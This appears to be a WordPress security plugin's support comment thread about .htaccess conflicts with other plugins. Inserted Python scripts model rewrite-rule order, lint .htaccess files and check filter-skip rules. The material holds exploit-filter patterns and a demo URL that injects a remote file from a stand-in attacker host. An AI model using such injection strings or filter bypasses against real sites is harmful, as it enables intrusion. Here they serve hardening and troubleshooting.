            Going back through my whole website today I found that there was code in pages that were not part of my blog. They do not show up in Google cache like the blog does, but they were still there “behind the scenes.” This has been a horrible experience, but I really appreciate your help.

  42. John says:

    Dear AITpro,

    First I just wanted to say thank you for creating such a wonderful BulletProof Security plug-in!!!

    I just recently updated BulletProof Security to V.46.1 and noticed that my BackupBuddy plug-in stopped working… when I activated [default mode] the BackupBuddy plug-in works fine. But when I activated the [bulletproof mode] the plug-in stopped working properly. When I go to PluginBuddy > Backups and click the full backup button, it makes a backup and then shows me a 404 error (page not found), but as soon as I activate [default mode] the plug-in works just fine.

    Please let me know how I can fix this

    P.S. Previous version of BulletProof Security work just fine with this plug-in

    Thanks!

    John B.

    • AITpro Admin says:

      Sounds like you have not activated BulletProof Mode for the wp-admin folder. I can’t think of any new coding in version .46.1 that would be affecting this plugin. Let me know if it was just not activating BulletProof Mode for the wp-admin folder. If not then I’ll put this plugin in testing. Thanks.

  43. bimple says:

    I messed up when updating the latest version of BPS. I deactivated the plugin, and then updated it through the automatic update option in the admin area, and when I reactivated the plugin I got an error that said:
    Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 378440 bytes) in /home/mysite/public_html/wp-admin/includes/admin.php on line 31
    I removed the plugin and still get the error. I renamed the plugin folder and it removed the error, but I got the error again after renaming the plugins folder back again. How can I remove the error and update BPS properly?

    • AITpro Admin says:

      Typically you will get these types of fatal errors when you try to perform something that causes a particular function to fail. An example would be if you were trying to upload an image that was beyond the capabilities or limitations of your website or a particular function. Or the error could actually be accurate and you just happened to run out of PHP memory when installing BPS, you have a memory leak issue, or possibly you are not running PHP5. See this WordPress Codex page: Editing_wp-config.php – Increasing_memory_allocated_to_PHP. PHP5 should have 128MB allocated by default, and the error is saying you only have 32MB. Try the WordPress fixes suggested in the link above, or if you have access to your php5.ini on your web host then you might be able to increase your allocated memory limit to 128MB by adding this directive to your php5.ini file:
      memory_limit = 128M
      I have my memory limit set to memory_limit = 256M
      Let me know what happens. Thanks.

  44. jack5107 says:

    Hi,

    Please HELP!
    Every time when I try to activate Bulletproof Mode each page on my website will give the same error: Internal error. My provider is One.com and I’m using WordPress 3.1.
    I did exactly what is in your guide. I watched your video tutorial. As far as I know I did nothing wrong.

    Thanks,
    Jack

    • AITpro Admin says:

      Hi,
      The video tutorial shows how to add your subfolder name for WordPress installations that are in a subfolder. Your WordPress website is installed in the root folder of your website domain so you would not need to add anything to the RewriteBase and RewriteRule in any of the .htaccess files. My guess is that you added your domain name /oculary/ to the .htaccess files, which is causing a 500 error. Thanks.

      • jack5107 says:

        NO! I didn’t add my domainname to the .htaccess files.
        Thanks.

        • AITpro Admin says:

          I googled your host in regards to htaccess files and I see that you must make sure that Options +FollowSymlinks is commented out with the # sign in front of it (# Options +FollowSymlinks), and you must also comment out Options -Indexes with a pound sign like this: # Options -Indexes. Please contact tech support for your web host and ask them what other special requirements they have for .htaccess files on their hosting, and also ask them if the php.ini file on their web hosting will interfere with .htaccess files on their hosting. You have permalinks enabled and are running PHP5 on your WordPress site, correct? Thanks.

          • jack5107 says:

            From my host is following information…

            Supported: Password protection, IP filtering, custom error pages (404, 301, 302, 500, 501 etc.), protection against hotlinking, mod_rewrite (e.g. Friendly URLs / Clean URLs), DirectoryIndex – A good link: Javascript Kit

            Not supported: Everything starting with Options, php_value, ForceType, AddHandler and SetHandler.

            They say: unfortunately, our php.ini file cannot be edited except for error reporting and register globals.
            And: You can view the following link for our server setup with the PHP configuration
            http://one-docs.com/specs/

            Is there a solution for Bulletproof with this provider? Or is it definitively not compatible?
            Thanks.

          • AITpro Admin says:

            You are good to go. You just need to comment out or delete the Options -Indexes line of htaccess code that is in all the master .htaccess files and then activate BulletProof Modes.

            Add a pound sign # in front of Options -Indexes to comment it out (shown below) or you can just delete it.

            # Options -Indexes
            Thanks

          • jack5107 says:

            Hi, sorry, I must have had an offday. I thought I added a pound sign before ‘options’, but I missed some. Excuses again. It’s ok now!!! Thank you!

          • AITpro Admin says:

            Cool glad you got it working! 😉 Yep off days are no fun. I usually turn off my computer and go to the beach before I do any damage. LOL I will remove this Directive from the htaccess files in the next version release of BPS. This was added by request and I never felt it was necessary and now that it has caused a problem it is history. Have a great day!

  45. atom says:

    hello again!
    is the order of the rules in the root htaccess important?

    when i added the WP Super Cache plugin, it wants to move the WP permalink stuff below the BPS entries, then add itself between the two.

    • AITpro Admin says:

      The only thing that is important as far as order goes in the root htaccess file is that the Query String Exploits filters are the last code in the htaccess file. The FilesMatch section of code (the very last bit of htaccess code) could go anywhere in the htaccess file, but I just chose to stick it at the end of the file.
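
Why the query-string filters have to come last is easiest to see by walking a rule list the way mod_rewrite does: rules are evaluated top to bottom, a RewriteRule with an S=n flag skips the next n rules when its conditions match, and a rule with the F flag forbids the request outright. The script below is an added example, not BPS code and not Apache's own engine; it models only the NC, OR, F and S=n flags, uses three of the query-string conditions quoted later in this thread (ftp\:, http\:, https\:), and adds an assumed skip rule for a plugin that passes an absolute URL in a url= parameter (the external-link info page discussed above is the motivating case; the parameter name and the sample URLs are constructed here).

```python
"""Model of how mod_rewrite walks a rule list, to show why skip rules must
precede the query-string exploit filters (added example, not BPS code)."""
import re
from urllib.parse import urlsplit


class Rule:
    """One RewriteRule with its preceding RewriteCond lines.

    conds: list of (regex, flags) tested against the query string. Consecutive
    conds joined by OR form a group; groups are ANDed, as Apache does.
    action: "forbid" (RewriteRule ... [F]) or ("skip", n) (RewriteRule . - [S=n]).
    """

    def __init__(self, conds, action):
        self.conds = conds
        self.action = action

    def matches(self, query):
        groups, current = [], []
        for pattern, flags in self.conds:
            rx = re.compile(pattern, re.I if "NC" in flags else 0)
            current.append(rx.search(query) is not None)
            if "OR" not in flags:           # a cond without OR closes its group
                groups.append(any(current))
                current = []
        if current:                         # tolerate a trailing OR
            groups.append(any(current))
        return all(groups) if groups else True


def evaluate(rules, url):
    """Walk the rules in order; return "forbidden" or "allowed"."""
    query = urlsplit(url).query
    i = 0
    while i < len(rules):
        rule = rules[i]
        if rule.matches(query):
            if rule.action == "forbid":
                return "forbidden"
            kind, n = rule.action
            if kind == "skip":
                i += n                      # S=n: jump over the next n rules
        i += 1
    return "allowed"


# Three conditions from the BPS query-string exploit filter as quoted in this
# thread. In the real file they are part of one long OR-chain ending in [F].
FILTERS = Rule(
    [(r"ftp\:", {"NC", "OR"}), (r"http\:", {"NC", "OR"}), (r"https\:", {"NC"})],
    "forbid",
)

# Assumed skip rule: exempt a request whose query string starts with
# url=http... from the next rule only. Parameter name is an assumption.
SKIP_REDIRECT = Rule([(r"^url=https?\:", {"NC"})], ("skip", 1))

ORDERED_CORRECTLY = [SKIP_REDIRECT, FILTERS]   # filters last: skip is reached
ORDERED_WRONGLY = [FILTERS, SKIP_REDIRECT]     # filters first: skip never runs


def demo():
    """Constructed sample URLs; returns {name: (filters-last, filters-first)}."""
    urls = {
        "plain page": "http://mydomain.com/?p=12",
        "injected remote url": "http://mydomain.com/?page=http://evil.example/x.txt",
        "redirect page": "http://mydomain.com/redirect?url=http://www.externaldomain.com",
    }
    return {name: (evaluate(ORDERED_CORRECTLY, u), evaluate(ORDERED_WRONGLY, u))
            for name, u in urls.items()}


if __name__ == "__main__":
    for name, (good, bad) in demo().items():
        print(f"{name:22s} filters-last: {good:9s} filters-first: {bad}")
```

The caveat a skip rule carries is visible in the model: anything that matches the skip condition sails past the filters it skips, so keep the condition as narrow as the plugin's real URL shape allows (anchor it, name the exact parameter, and skip only the rules that actually conflict rather than a large S=n count).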

      • atom says:

        thanks for that – i didn’t see it in the docs anywhere, but i might have missed it
        i’ll tell the WP Super Cache guys about this because they’re changing the order

  46. Robbie says:

    Hello! I just installed your WordPress Bulletproof security plugin after having to reinstall my whole blog due to being hacked, so I’m just getting acquainted with it. I also installed WP-MalWatch just in case. Anyways. According to MalWatch, in the /public_html/wp-content/bps-backup/.htaccess file there, this appears in the content of the file:

    order deny,allow
    deny from all
    allow from 75.22.47.234

    Now, that isn’t my computer’s IP, and I don’t know if I am super paranoid, but I want to know, if I didn’t add that rule, why it’s in my backed up .htaccess file. I manually deleted it via FTP, just in case. Maybe this is a very stupid question, but I’ve spent almost three days fixing this website and I really would appreciate it if you could help me out.

    Thank you for your help.

    Robbie.

    • AITpro Admin says:

      Hi,
      That was the current IP address of my computer at the time I was testing enabling downloading of files from the bps-backup folder. That IP address has since been changed by my ISP 100’s of times via DHCP. This was just a knick-knack that I forgot to remove on the last release of BPS. When you click the Enable Backed Up File Downloading button on the BPS upload/download/edit page it will write a new htaccess file with whatever your current IP address is now. IP addresses change very frequently since they are randomly and automatically assigned via DHCP by your ISP. Anyway, this is nothing to worry about. The allow from 75.22.47.234 line of htaccess code was just something that should have been removed after testing, but it was missed. Someone would have better odds of winning the lottery than guessing and spoofing that particular IP address to download your backed up BPS master files. You want to make sure that there is a deny all htaccess file in your bps-backup folder, so just click the Enable Backed Up File Downloading button on the BPS upload/download/edit page and a new htaccess file will be written to the bps-backup folder with your current computer IP address. Thanks.

  47. atom says:

    BPS “Update File” (.htaccess) 404 error (minor)

    BPS .46
    WP 3.1
    LAMP

    hi Ed – this is unrelated to the eShop fix (and i’ll get back to you on that i promise)

    I was able to use the BPS interface to edit these files before, but I have no idea why it’s not working now – obviously something changed.
    I read a few pages with information on this and here’s what I did to try and resolve the problem:

    * verified theme path (which i knew was correct)
    * CHMOD BPS backup and admin\htaccess dirs 755 (the backup dir was 750 by the way)
    * switch to the default root .htaccess
    * tested the “update file” button on the edit theme UI – works fine
    * auto-reinstall WP core files

    The address I’m being directed to when clicking “update file”:

    http://my_site/wp-admin/options-general.php?page=bulletproof-security/admin/options.php#tabs-5

    • AITpro Admin says:

      No hurry on eShop, I am slammed with work. LOL, I won't be able to do any plugin testing until Sunday. It sounds like you might have some white space where it should not be in the htaccess files. White space is OK between code lines and code fixes, but within a code line you must have the exact spacing that is required. In some code lines a single white space is required, and if you added 2 white spaces then you would get 404 errors or even 500 errors.
      Yep, the 750 thing was a mistake on my part. I forgot to add CHMOD 755 in the previous release of BPS. So maybe you should download copies of the BPS master htaccess files, then remove BPS entirely and then reinstall BPS. Thanks.

      • atom says:

        I'm under the impression you need a blank line at the end of .htaccess and there wasn't one in 2 of them… there is now.

        Regarding spaces, I removed the double spaces I knew were safe to remove; they were in code I stuck in there.

        There are double spaces (not tabs) in some of the default BPS lines and I don't know if they're supposed to be there, but I'm guessing you know what you're doing FAR more than dummy me 🙂
        Here they are, between ':' and '[':

        RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
        RewriteCond %{QUERY_STRING} http\: [NC,OR]
        RewriteCond %{QUERY_STRING} https\: [NC,OR]

        I haven't yet found any other problems in the .htaccess files and the “update file” button is still bUSt3D!!!

        If you don't have any off-the-top-of-your-head suggestions, don't sweat it. The problem is likely something I buggered up.

      • atom says:

        Oh… here's the core of the .htaccess in the root; maybe you can spot something wrong:

        # I stuck this in here; I did have 4 spaces before all the Rewrites
        # redirect all https to http

        RewriteEngine On
        RewriteCond %{SERVER_PORT} ^443$
        RewriteRule ^(.*)$ http://%{HTTP_HOST}/$1 [R=301,L]

        # BEGIN WordPress

        RewriteEngine on
        RewriteBase /
        RewriteRule ^download/([^/]+)$ http://12bytes.org/wp-content/plugins/download-monitor/download.php?id=$1 [L]

        RewriteEngine On
        RewriteBase /
        RewriteRule ^index\.php$ - [L]
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteRule . /index.php [L]

        # END WordPress

        • AITpro Admin says:

          Looks like you are rewriting SSL to HTTP, but the RewriteRule does not look valid. I'm not sure what the Download Monitor RewriteRule is all about. In any case you have some more advanced stuff going on, so you should check the askapache site for excellent htaccess tips. I eventually plan on adding a bunch of htaccess tips and tricks on my site, but right now there is nothing. Thanks.
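The problems discussed in this thread (a leftover 'allow from' line for a single address in the bps-backup folder, and the spacing and copy-and-paste damage suspected in hand-edited .htaccess files) are easy to catch with a small linter before a file is uploaded. The script below is an added example, not part of the BPS plugin or anything posted here; the sample file, the 203.0.113.7 address (a documentation address) and the lint_htaccess function are constructed for it. It flags characters outside ASCII such as an en dash pasted where '-' was meant, tabs or doubled spaces inside a directive, every 'allow from' grant, a missing final newline, and the absence of 'deny from all' when the file is supposed to close a folder.

```python
import re

# Constructed sample modelled on the fragments posted in this thread, not any
# poster's real file. It contains an en dash pasted where '-' belongs, a doubled
# space inside a directive, a leftover 'allow from' for a single address
# (203.0.113.7 is a documentation address) and no final newline.
SAMPLE_HTACCESS = (
    "# BEGIN WordPress\n"
    "RewriteEngine On\n"
    "RewriteBase /\n"
    "RewriteRule ^index\\.php$ \u2013 [L]\n"
    "RewriteCond %{REQUEST_FILENAME} !-f\n"
    "RewriteRule . /index.php [L]\n"
    "# END WordPress\n"
    "RewriteCond %{QUERY_STRING}  ftp\\: [NC,OR]\n"
    "allow from 203.0.113.7"
)

ALLOW_RE = re.compile(r"^allow\s+from\s+(.+?)$", re.IGNORECASE)
DENY_ALL_RE = re.compile(r"^deny\s+from\s+all$", re.IGNORECASE)


def lint_htaccess(text, expect_deny_all=False):
    """Return (line_number, message) findings for the body of an .htaccess file.

    Checks are limited to what this thread ran into: characters outside ASCII
    (an en dash or smart quote pasted into a directive), tabs or doubled
    spaces inside a directive, any 'allow from' grant, a missing final
    newline, and, when expect_deny_all is set, the absence of 'deny from all'
    in a folder that is supposed to be closed. Line 0 marks a whole-file
    finding.
    """
    findings = []
    lines = text.split("\n")
    if text and not text.endswith("\n"):
        findings.append((len(lines), "file does not end with a newline"))
    saw_deny_all = False
    for num, line in enumerate(lines, start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # comments and blank lines never affect the rules
        odd = [c for c in stripped if ord(c) > 127]
        if odd:
            findings.append((num, "non-ASCII character %r in directive; "
                                  "was '-' or a quote replaced when pasting?" % odd[0]))
        if "\t" in stripped or "  " in stripped:
            findings.append((num, "tab or doubled space inside directive; "
                                  "compare the spacing with the original rule"))
        grant = ALLOW_RE.match(stripped)
        if grant:
            findings.append((num, "grants access to %s; remove stale test "
                                  "addresses from a closed folder" % grant.group(1)))
        if DENY_ALL_RE.match(stripped):
            saw_deny_all = True
    if expect_deny_all and not saw_deny_all:
        findings.append((0, "no 'deny from all'; the folder is not closed"))
    return findings


if __name__ == "__main__":
    for num, msg in lint_htaccess(SAMPLE_HTACCESS, expect_deny_all=True):
        print("line %d: %s" % (num, msg))
```

Run lint_htaccess on the contents of the bps-backup copy with expect_deny_all=True; an empty list means none of these checks fired. The whitespace finding is there so the spacing can be compared against the original rule; the non-ASCII characters and the access grants are the findings that need action.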

  48. atom says:

    WP 3.1
    BPS .46
    LAMP

    hello!
    I think (not sure) there may be an issue with BPS and PayPal IPN???

    I'm using eShop http://wordpress.org/extend/plugins/eshop/ and it isn't sending any emails to me when orders are placed, and the orders are always marked as “pending” (I do receive WP emails for comments, so I think the WP mail function is OK).

    The fellas at eShop seem pretty confident with their script and think this may be a plugin conflict. I read on this site where it was suggested to stick a default .htaccess (less the rule for denying access to wp-config) in the IPN directory, which I did, but the orders are still marked as “pending”.

    I'm wondering if anyone has used eShop with BPS and could offer some tips?

    • AITpro Admin says:

      Yes, there is an issue with PayPal IPN. And yes, the workaround was to add a default htaccess file to the folder where the IPN script is. This is an issue that I had meant to add to the compatibility testing page, but it got forgotten. I will add it so that a permanent fix can be implemented into the secure.htaccess master htaccess file for future releases of BPS.

      Yep, their code is most likely solid, but typically plugin testing is not done in a secure htaccess environment, so I will add this plugin to the compatibility testing page.

      I think you probably have 2 issues: 1 with IPN and then 1 with eShop. I have quickly glanced at the eShop architecture and the payment gateways may be bundled into the plugin files, so I am not sure if this would include IPN as well. For now try this. If IPN is in a separate folder, add the default.htaccess file to the folder that contains the IPN script and rename it to just .htaccess (removing default from the file name). If the IPN script is contained or located in the plugin folder then just add this htaccess code below to Your Current Root htaccess File using the built-in BPS File Editor. You can copy and paste directly to your Root htaccess file and update it.

      # eShop test fix - pending verification that it works
      # If you have WordPress installed in a subfolder you will need to add the
      # subfolder name to the RewriteCond /blog/wp-content/plugins/eshop/ [NC]
      RewriteCond %{REQUEST_URI} ^/wp-content/plugins/eshop/ [NC]
      RewriteRule . - [S=30]

      Let me know if this works. I will do further testing in a few days. Thanks.

      Also a lot of people then ask if the store will not be securely protected. I would hope that the plugin already has security built into it or is just handling connecting you to secure servers otherwise that would mean that the plugin was released without any security and that would obviously not be a good thing for a plugin that is dealing with sensitive personal information. 😉
      Ed

      • atom says:

        Ed, thank you much
        I will get back to you either way.

      • atom says:

        Regarding the eShop fix, I don't know if it works or not as PP IPN apparently still was not connecting to my site.
        I finally got disgusted with it and dumped the plugin.

        • AITpro Admin says:

          Sorry i have not been able to get to this – on hour 23 working straight and no end in sight. AHHHHHHHH!!!!!

          • atom says:

            23 hours?
            jeez Ed, you’re wasting an hour somewhere!

            Just wanted to let you know that I didn't intend the “I got disgusted” comment to apply to you 🙂 I got disgusted with the lack of support from them.

            Having said that, I may try eShop again :/
            If so, I'll get back to you.

          • AITpro Admin says:

            Ha ha, good one. I don't know how long a human can go without sleep before completely losing it, but I never want to work 38 hours straight ever again in my life. I met the deadlines I was supposed to meet, but it took a toll. I was not right for 2 days after that.
            I temporarily removed eShop from the plugin testing list because I was not going to be able to get to it any time soon. Caching, image thumbnailing, login, password resetting, password strength indicators and login redirections are all good to go now overall, so it is time to focus on the whole eCommerce plugin arena. What I need to do is make a list of the primary strings that are used in eCommerce plugins so I can test each string for issues and create general htaccess rules for them to cover potential problems on a larger scale. The other issue with eCommerce plugins is that I see a virtual directory or actual separate directory is used fairly often, and of course then there is the issue of payment gateways. So that is the next area that needs to be looked into. I think what I will probably end up doing is creating another BulletProof all purpose htaccess file made specifically for eCommerce plugins. This way people can just add it to the actual directory or, if it is a virtual directory, then add the eCommerce specific htaccess code to the root htaccess file.

  49. sean says:

    Hi Ed,

    I cannot delete plugins or templates, or edit and add widgets to my sidebar. When I try to delete, it brings me to the 404 error page of my website. Is there some conflict with the BulletProof plugin? Appreciate the help.

    Thank You,

    Sean R.

    • AITpro Admin says:

      Hi Sean,
      You just need to activate BulletProof Mode for your wp-admin folder. Thanks.
      Ed

      • sean says:

        Appreciate the help Ed. I have another issue with a client's site kaimanashells.com: everything works fine but the product images do not display after the install. How do I get them to display? Thanks in advance.

        Thank You,

        Sean R.

        • AITpro Admin says:

          Hi Sean,
          This is an image thumbnailer issue. The image thumbnailer for this site is named phpThumb, so just change the name in the TimThumb fix in your Current Root htaccess File using the built-in BPS File Editor. Thanks.

          # TimThumb Thumbnail Images not displaying - Red X instead of Images
          # If your theme uses TimThumb and the file is called something else like thumb.php then change the filename below
          RewriteCond %{REQUEST_FILENAME} phpThumb(.*) [NC]
          RewriteRule . - [S=30]
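Both the eShop fix and this thumbnailer fix use the same skip construct: one RewriteCond on a server variable followed by RewriteRule . - [S=30], which makes mod_rewrite jump over the next thirty RewriteRule lines (the BPS security filters) whenever the condition matches. A RewriteCond pattern is searched within the variable rather than anchored, and [NC] makes that search case-insensitive, so it is worth checking exactly which requests a whitelist pattern lets through. The Python below is an added example, not plugin code: it evaluates the two conditions from the replies above, plus the subfolder variant the eShop comment asks for, against constructed request lines. DOCROOT, the rule names and the server_vars mapping are assumptions of the example.

```python
import re
from collections import namedtuple

# Assumed document root of a root-folder WordPress install (example only).
DOCROOT = "/var/www/html"

# One skip rule as used in this thread: a single RewriteCond on a server
# variable, followed by "RewriteRule . - [S=30]". When the condition matches,
# mod_rewrite skips the next thirty RewriteRule lines, which in a BPS root
# .htaccess are the security filters.
SkipRule = namedtuple("SkipRule", "name variable pattern nocase")

# Conditions taken from the replies above; the names are the example's own.
ROOT_INSTALL_RULES = [
    SkipRule("eshop", "REQUEST_URI", r"^/wp-content/plugins/eshop/", True),
    SkipRule("phpthumb", "REQUEST_FILENAME", r"phpThumb(.*)", True),
]

# The variant the eShop comment asks for when WordPress lives in /blog/.
SUBFOLDER_INSTALL_RULES = [
    SkipRule("eshop-blog", "REQUEST_URI", r"^/blog/wp-content/plugins/eshop/", True),
    SkipRule("phpthumb", "REQUEST_FILENAME", r"phpThumb(.*)", True),
]


def server_vars(request_line):
    """Derive the variables the rules test from a 'path?query' request line.

    REQUEST_URI is the path without the query string; REQUEST_FILENAME is
    assumed to be that path mapped under DOCROOT, which is what a per-directory
    rewrite sees once the request has been mapped to a file.
    """
    path, _, query = request_line.partition("?")
    return {
        "REQUEST_URI": path,
        "QUERY_STRING": query,
        "REQUEST_FILENAME": DOCROOT + path,
    }


def skipping_rule(request_line, rules=ROOT_INSTALL_RULES):
    """Return the name of the first rule whose condition matches, else None.

    A RewriteCond pattern is a regular expression searched within the variable
    (anchor with ^ to pin it), and [NC] makes the search case-insensitive, so
    re.search with re.IGNORECASE mirrors the test for the patterns used here.
    """
    env = server_vars(request_line)
    for rule in rules:
        flags = re.IGNORECASE if rule.nocase else 0
        if re.search(rule.pattern, env[rule.variable], flags):
            return rule.name
    return None


def bypassing_requests(request_lines, rules=ROOT_INSTALL_RULES):
    """Map each request line to the rule that lets it skip the filters, or None."""
    return {line: skipping_rule(line, rules) for line in request_lines}


if __name__ == "__main__":
    # Constructed request lines for illustration.
    samples = [
        "/wp-content/plugins/eshop/ipn.php",
        "/blog/wp-content/plugins/eshop/ipn.php",
        "/wp-content/themes/demo/phpThumb.php?src=a.jpg",
        "/uploads/phpthumb-lookalike.php",
        "/wp-admin/edit.php?post=1",
    ]
    for line, name in bypassing_requests(samples).items():
        print("%-50s -> %s" % (line, name or "filtered"))
```

The sample requests show the trade-off between the two patterns. The anchored eShop pattern does not match a /blog/ subfolder install at all, which is why the comment says to add the subfolder name. The unanchored phpThumb pattern matches any path containing that string in any case, so every such request, not only the theme's thumbnailer, bypasses the thirty filters that follow; if the thumbnailer lives in one known place, anchoring the pattern to that path keeps the skip as narrow as the fix needs.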
          
          • sean says:

            Hi Ed,

            Thanks again. How would I change the file name do you have an example ? and where can I find the image thumbnailer in the theme ?

            Thank You,

            Sean R.

          • AITpro Admin says:

            Hi Sean,
            Yeah, the code in the previous reply has the correct name of the image thumbnailer that your theme is using. To find the image thumbnailer location on your website you would right-click on any of the images that are showing a red X instead of the image and then click Properties. This will give you the full path to where the image thumbnailer is located on your site. You will be changing the name of the thumbnailer in the BPS file (the htaccess fix for this). You are not actually changing the name of the thumbnailer file itself. Click on the Upload / Download / Edit menu tab on the BPS Settings page and then make the edit shown in the previous reply to Your Current Root htaccess File. Thanks.
            Ed

          • sean says:

            Hi Ed,

            Sorry, you had replied on the other post re: image issues. What was I thinking? Too many brown bottles 🙂 Will upgrade in the near future, also for my offline clients. Outstanding support, you have a customer for life.

            Thank You,

            Sean R.

          • AITpro Admin says:

            Hi Sean,

            I’m jealous on the brown bottles. Would that be Guinness by any chance – my favorite! My day off is Sunday so I unfortunately have to behave until Saturday night. Phooey. Thanks.
            Ed

  50. Ben says:

    I'm having a problem with the BulletProof plugin and an email program I use. It's blocking me from getting to the admin area. I will look at this again after you do the videos and I have more time, but right now I need to delete it and get some work done. What files have to be deleted? I deactivated the plugin and deleted it, but noticed the htaccess was still bulletproof#46, etc. I have an original htaccess backup. Please tell me what files need to be deleted. Thanks

    • AITpro Admin says:

      Hi Ben,
      Also you need to have BulletProof Mode activated for your wp-admin folder or else things like adding / removing widgets and getting into other plugins options and settings pages will be blocked.

      The video tutorial has been completed you can view it here >>> http://www.ait-pro.com/aitpro-blog/2481/bulletproof-security-plugin-support/wordpress-security-bulletproof-security-setup-bulletproof-security-wordpress-subfolder-installation/

      To generate and use the default htaccess file that WordPress creates for you, you would just need to update your permalinks and then remove all other htaccess code in Your Current Root htaccess File using the built-in BPS File Editor. The htaccess code that WordPress generates starts with # BEGIN WordPress and ends with # END WordPress. You can then remove all other htaccess code that pertains to BulletProof Security, i.e. the security filters that protect your website from hackers. If you deleted the BPS plugin then you will have to use the traditional method of modifying WordPress htaccess files: FTP to your website, download the htaccess file in your website root folder, make your edits and then upload it back to your website root folder. Thanks.
      Ed
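The clean-up described above, keeping only the block between # BEGIN WordPress and # END WordPress, can be done mechanically with the markers. The Python below is an added example, not BPS or WordPress code; the sample file, the placeholder filter rules around the block, and the wordpress_block and removed_directives functions are constructed for it. It refuses to guess when a marker is missing, since in that case the block should be regenerated by re-saving Permalinks rather than reconstructed by hand.

```python
WP_BEGIN = "# BEGIN WordPress"
WP_END = "# END WordPress"

# Constructed root .htaccess for the example: WordPress's own block with
# placeholder filter rules before and after it (they stand in for the plugin's
# rules and are not real BPS code).
SAMPLE_ROOT_HTACCESS = """\
# placeholder filter before the WordPress block
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
RewriteRule . - [F,L]

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

# placeholder skip rule after the block
RewriteCond %{REQUEST_URI} ^/wp-content/plugins/eshop/ [NC]
RewriteRule . - [S=30]
"""


def wordpress_block(text):
    """Return the '# BEGIN WordPress' ... '# END WordPress' block, newline-terminated.

    Raises ValueError when either marker is missing, in which case the block
    should be regenerated by re-saving Permalinks rather than guessed at.
    """
    lines = text.splitlines()
    try:
        start = lines.index(WP_BEGIN)
        end = lines.index(WP_END, start)
    except ValueError:
        raise ValueError("WordPress markers not found; re-save Permalinks to regenerate them") from None
    return "\n".join(lines[start:end + 1]) + "\n"


def directive_count(text):
    """Count lines that are neither blank nor comments."""
    return sum(1 for l in text.splitlines() if l.strip() and not l.strip().startswith("#"))


def removed_directives(text):
    """Number of directives dropped when everything but the WordPress block is kept."""
    return directive_count(text) - directive_count(wordpress_block(text))


if __name__ == "__main__":
    print(wordpress_block(SAMPLE_ROOT_HTACCESS), end="")
    print("dropped %d non-WordPress directives" % removed_directives(SAMPLE_ROOT_HTACCESS))
```

Write the returned block over the root .htaccess only after keeping a copy of the original, as the reply suggests; removed_directives gives a quick sanity check that the number of dropped lines is what you expected.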

